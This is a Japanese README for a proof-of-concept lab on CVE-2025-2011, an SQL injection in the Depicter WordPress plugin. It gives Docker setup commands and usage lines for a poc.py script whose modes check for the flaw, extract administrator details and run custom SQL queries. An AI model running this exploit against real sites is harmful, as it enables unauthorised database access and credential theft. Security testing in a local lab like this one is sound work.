
CVE-2025-2011 の PoC - Depicter プラグイン <= 3.6.1 における SQLインジェクション
CVEリファレンス: CVE-2025-2011
このリポジトリは、Depicter Slider & Popup Builderプラグイン(バージョン3.6.2未満)のSQLインジェクション脆弱性をテストするための概念実証環境を含んでいます。
requests, colorama環境を起動
docker-compose up -d
WordPressのインストールを完了
http://localhost:5555にアクセス脆弱性のあるプラグインをインストール
chmod +x install-plugin.sh
./install-plugin.sh
このスクリプトは以下の処理を行います:
Python依存関係をインストール
pip install requests colorama
PoCスクリプト(poc.py)を使用して、異なるモードで脆弱性をテストできます:
ターゲットが脆弱かどうかを確認
python poc.py -u http://localhost:5555
管理者詳細を抽出
python poc.py -u http://localhost:5555 -m admin
カスタムSQLクエリを実行
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
デバッグ出力を有効化
python poc.py -u http://localhost:5555 -d
環境を停止して削除するには:
docker-compose down -v
この環境は教育およびテスト目的のみで提供されています。明示的な許可なくシステムに対して使用しないでください。